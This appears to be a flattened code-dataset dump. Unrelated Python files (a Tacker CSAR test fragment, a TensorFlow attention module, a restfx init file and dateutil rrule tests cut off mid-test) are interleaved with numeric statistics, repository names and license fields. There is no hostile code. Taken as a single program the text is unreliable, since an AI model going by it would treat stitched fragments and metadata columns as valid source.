zip_name, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, zip_name)
msg = ('artifacts of type "tosca.artifacts.nfv.SwImage"'
' is added more than one time for node VDU1.')
self.assertEqual(msg, exc.format_message())
os.remove(zip_name)
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_unit_conversion(
self, mock_extract_csar_zip_file):
file_path, _ = utils.create_csar_with_unique_vnfd_id(
'./tacker/tests/etc/samples/etsi/nfv/sample_vnfpkg_tosca_vnfd')
self.addCleanup(os.remove, file_path)
vnf_data, flavours, vnf_artifact = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
# 'size', 'min_disk' and 'min_ram' values from sample VNFD will
# be converted to Bytes
self.assertEqual(flavours[0]['sw_images'][0]['min_disk'], 1000000000)
self.assertEqual(flavours[0]['sw_images'][0]['size'], 1879048192)
self.assertEqual(flavours[0]['sw_images'][1]['min_disk'], 2000000000)
self.assertEqual(flavours[0]['sw_images'][1]['size'], 2000000000)
self.assertEqual(flavours[0]['sw_images'][1]['min_ram'], 8590458880)
| 51.130621 | 79 | 0.659561 | 2,949 | 23,878 | 4.96609 | 0.085792 | 0.038785 | 0.051622 | 0.066371 | 0.816661 | 0.808467 | 0.800546 | 0.78648 | 0.769409 | 0.766405 | 0 | 0.009313 | 0.240012 | 23,878 | 466 | 80 | 51.240343 | 0.797708 | 0.032373 | 0 | 0.641463 | 0 | 0 | 0.232122 | 0.148915 | 0 | 0 | 0 | 0 | 0.219512 | 1 | 0.07561 | false | 0 | 0.029268 | 0.002439 | 0.112195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a2637e029636484c193ceed43225e7f352fd298 | 3,094 | py | Python | util/model_luong_attention.py | david-yoon/detecting-incongruity | 2e121fdba0da3a6a0c63df0c46a101a789fe7565 | [
"MIT"
] | 36 | 2018-11-25T21:43:10.000Z | 2022-03-13T10:47:50.000Z | util/model_luong_attention.py | david-yoon/detecting-incongruity | 2e121fdba0da3a6a0c63df0c46a101a789fe7565 | [
"MIT"
] | 1 | 2019-06-16T07:45:47.000Z | 2019-10-14T06:00:29.000Z | util/model_luong_attention.py | david-yoon/detecting-incongruity | 2e121fdba0da3a6a0c63df0c46a101a789fe7565 | [
"MIT"
] | 5 | 2018-12-09T06:40:19.000Z | 2019-10-17T22:07:58.000Z | #-*- coding: utf-8 -*-
import tensorflow as tf
'''
desc : apply luong attention to target vector with given condition
input :
- batch_size :
- target : [batch, seq, embed]
- condition : [batch, embed] --> last hidden
- target_encoder_length : max encoder length
- hidden : should be same btw target and condition, otherwise code should be changed
output :
- attented target : weighted sum [batch, embed]
- norm_dot : attention weight
'''
def luong_attention( batch_size, target, condition, target_encoder_length, hidden_dim ) :
# same dim [batch, max_seq, embed]
batch_seq_embed_target = tf.reshape( target, [batch_size, target_encoder_length, hidden_dim] )
batch_embed_given = condition
batch_seq_embed_given = tf.reshape( batch_embed_given, [batch_size, hidden_dim, 1] )
# calculate similarity
dot = tf.matmul( batch_seq_embed_target, batch_seq_embed_given )
# pad goes to -inf --> goes "0" after softmax
pad_position = tf.equal(tf.reshape(dot, [batch_size, target_encoder_length]), 0.0)
tmp = tf.to_float(pad_position) * -1e9
tmp = tf.expand_dims(tmp, 2)
base = tf.ones( [batch_size, target_encoder_length, 1] ) * tmp
norm_dot = tf.nn.softmax( dot+base, dim=1 )
# weighted sum by using similarity (normalized)
target_mul_norm = tf.multiply( batch_seq_embed_target, norm_dot )
weighted_sum = tf.reduce_sum( target_mul_norm, axis=1 )
return weighted_sum, norm_dot
'''
desc : apply luong attention to target vector with given condition
input :
- batch_size :
- target : [batch, seq, embed]
- condition : [batch, embed] --> last hidden
- target_encoder_length : max encoder length
- hidden : should be same btw target and condition, otherwise code should be changed
output :
- attented target : weighted sum [batch, embed]
- norm_dot : attention weight
'''
def luong_attention_new( batch_size, target, condition, batch_seq, max_len, hidden_dim ) :
# same dim [batch, max_seq, embed]
batch_seq_embed_target = tf.reshape( target, [batch_size, max_len, hidden_dim] )
batch_embed_given = condition
batch_seq_embed_given = tf.reshape( batch_embed_given, [batch_size, hidden_dim, 1] )
# calculate similarity
dot = tf.matmul( batch_seq_embed_target, batch_seq_embed_given )
dot = tf.squeeze(dot)
"""
# pad goes to -inf --> goes "0" after softmax
"""
mask = tf.sequence_mask( lengths=batch_seq, maxlen=max_len, dtype=tf.float32 )
mask_value = -tf.ones_like( mask ) * tf.float32.max
mask_value = tf.multiply( mask_value, ( 1- mask ) )
base = mask_value
norm_dot = tf.nn.softmax( dot + base, dim=-1 )
# weighted sum by using similarity (normalized)
target_mul_norm = tf.multiply( batch_seq_embed_target, tf.expand_dims(norm_dot, -1) )
weighted_sum = tf.reduce_sum( target_mul_norm, axis=1 )
return weighted_sum, norm_dot | 34.377778 | 103 | 0.662896 | 414 | 3,094 | 4.690821 | 0.205314 | 0.057673 | 0.08033 | 0.058702 | 0.808445 | 0.759011 | 0.759011 | 0.759011 | 0.729145 | 0.729145 | 0 | 0.008955 | 0.242081 | 3,094 | 90 | 104 | 34.377778 | 0.81919 | 0.086296 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.035714 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a4854ea7dc30866c8aec8da5f94e187d789c58c | 34 | py | Python | src/restfx/session/__init__.py | hyjiacan/restfx | 8ba70bc099e6ace0c9b3afe8909ea61a5ff82dec | [
"MIT",
"BSD-3-Clause"
] | 5 | 2021-01-25T11:09:41.000Z | 2021-04-28T07:17:21.000Z | src/restfx/session/__init__.py | mgbin088/restfx | 86a499a9a4396829e2c40428feb8b2ee13406d52 | [
"MIT",
"BSD-3-Clause"
] | null | null | null | src/restfx/session/__init__.py | mgbin088/restfx | 86a499a9a4396829e2c40428feb8b2ee13406d52 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2021-01-28T00:53:37.000Z | 2021-01-28T00:53:37.000Z | from .session import HttpSession
| 17 | 33 | 0.823529 | 4 | 34 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147059 | 34 | 1 | 34 | 34 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a537119e33b3426368dbd5821dc8fd3b8adda07 | 209,361 | py | Python | dateutil/test/test_rrule.py | NATTURNER777/khbgkjgj | c75e4094a07b98742224008ae09ea40f9b19aa1a | [
"Apache-2.0"
] | null | null | null | dateutil/test/test_rrule.py | NATTURNER777/khbgkjgj | c75e4094a07b98742224008ae09ea40f9b19aa1a | [
"Apache-2.0"
] | null | null | null | dateutil/test/test_rrule.py | NATTURNER777/khbgkjgj | c75e4094a07b98742224008ae09ea40f9b19aa1a | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ._common import WarningTestMixin
from datetime import datetime, date
import unittest
from six import PY3
from dateutil.rrule import (
rrule, rruleset, rrulestr,
YEARLY, MONTHLY, WEEKLY, DAILY,
HOURLY, MINUTELY, SECONDLY,
MO, TU, WE, TH, FR, SA, SU
)
class RRuleTest(WarningTestMixin, unittest.TestCase):
def _rrulestr_reverse_test(self, rule):
"""
Call with an `rrule` and it will test that `str(rrule)` generates a
string which generates the same `rrule` as the input when passed to
`rrulestr()`
"""
rr_str = str(rule)
rrulestr_rrule = rrulestr(rr_str)
self.assertEqual(list(rule), list(rrulestr_rrule))
def testStrAppendRRULEToken(self):
# `_rrulestr_reverse_test` does not check if the "RRULE:" prefix
# property is appended properly, so give it a dedicated test
self.assertEqual(str(rrule(YEARLY,
count=5,
dtstart=datetime(1997, 9, 2, 9, 0))),
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=5")
rr_str = (
'DTSTART:19970105T083000\nRRULE:FREQ=YEARLY;INTERVAL=2'
)
self.assertEqual(str(rrulestr(rr_str)), rr_str)
def testYearly(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testYearlyInterval(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0),
datetime(2001, 9, 2, 9, 0)])
def testYearlyIntervalLarge(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
interval=100,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(2097, 9, 2, 9, 0),
datetime(2197, 9, 2, 9, 0)])
def testYearlyByMonth(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 2, 9, 0),
datetime(1998, 3, 2, 9, 0),
datetime(1999, 1, 2, 9, 0)])
def testYearlyByMonthDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 10, 1, 9, 0),
datetime(1997, 10, 3, 9, 0)])
def testYearlyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(1998, 1, 7, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testYearlyByWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testYearlyByNWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 25, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 12, 31, 9, 0)])
def testYearlyByNWeekDayLarge(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 11, 9, 0),
datetime(1998, 1, 20, 9, 0),
datetime(1998, 12, 17, 9, 0)])
def testYearlyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testYearlyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 29, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testYearlyByMonthAndNWeekDayLarge(self):
# This is interesting because the TH(-3) ends up before
# the TU(3).
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 15, 9, 0),
datetime(1998, 1, 20, 9, 0),
datetime(1998, 3, 12, 9, 0)])
def testYearlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testYearlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testYearlyByYearDay(self):
self.assertEqual(list(rrule(YEARLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testYearlyByYearDayNeg(self):
self.assertEqual(list(rrule(YEARLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testYearlyByMonthAndYearDay(self):
self.assertEqual(list(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testYearlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testYearlyByWeekNo(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testYearlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testYearlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testYearlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testYearlyByEaster(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testYearlyByEasterPos(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testYearlyByEasterNeg(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testYearlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testYearlyByHour(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1998, 9, 2, 6, 0),
datetime(1998, 9, 2, 18, 0)])
def testYearlyByMinute(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1998, 9, 2, 9, 6)])
def testYearlyBySecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1998, 9, 2, 9, 0, 6)])
def testYearlyByHourAndMinute(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1998, 9, 2, 6, 6)])
def testYearlyByHourAndSecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1998, 9, 2, 6, 0, 6)])
def testYearlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testYearlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testYearlyBySetPos(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonthday=15,
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 11, 15, 18, 0),
datetime(1998, 2, 15, 6, 0),
datetime(1998, 11, 15, 18, 0)])
def testMonthly(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 10, 2, 9, 0),
datetime(1997, 11, 2, 9, 0)])
def testMonthlyInterval(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 11, 2, 9, 0),
datetime(1998, 1, 2, 9, 0)])
def testMonthlyIntervalLarge(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
interval=18,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1999, 3, 2, 9, 0),
datetime(2000, 9, 2, 9, 0)])
def testMonthlyByMonth(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 2, 9, 0),
datetime(1998, 3, 2, 9, 0),
datetime(1999, 1, 2, 9, 0)])
def testMonthlyByMonthDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 10, 1, 9, 0),
datetime(1997, 10, 3, 9, 0)])
def testMonthlyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(1998, 1, 7, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testMonthlyByWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
# Third Monday of the month
self.assertEqual(rrule(MONTHLY,
byweekday=(MO(+3)),
dtstart=datetime(1997, 9, 1)).between(datetime(1997, 9, 1),
datetime(1997, 12, 1)),
[datetime(1997, 9, 15, 0, 0),
datetime(1997, 10, 20, 0, 0),
datetime(1997, 11, 17, 0, 0)])
def testMonthlyByNWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 25, 9, 0),
datetime(1997, 10, 7, 9, 0)])
def testMonthlyByNWeekDayLarge(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 10, 16, 9, 0)])
def testMonthlyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testMonthlyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 29, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testMonthlyByMonthAndNWeekDayLarge(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 15, 9, 0),
datetime(1998, 1, 20, 9, 0),
datetime(1998, 3, 12, 9, 0)])
def testMonthlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testMonthlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testMonthlyByYearDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testMonthlyByYearDayNeg(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testMonthlyByMonthAndYearDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testMonthlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testMonthlyByWeekNo(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testMonthlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testMonthlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testMonthlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testMonthlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testMonthlyByEaster(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testMonthlyByEasterPos(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testMonthlyByEasterNeg(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testMonthlyByHour(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 10, 2, 6, 0),
datetime(1997, 10, 2, 18, 0)])
def testMonthlyByMinute(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 10, 2, 9, 6)])
def testMonthlyBySecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 10, 2, 9, 0, 6)])
def testMonthlyByHourAndMinute(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 10, 2, 6, 6)])
def testMonthlyByHourAndSecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
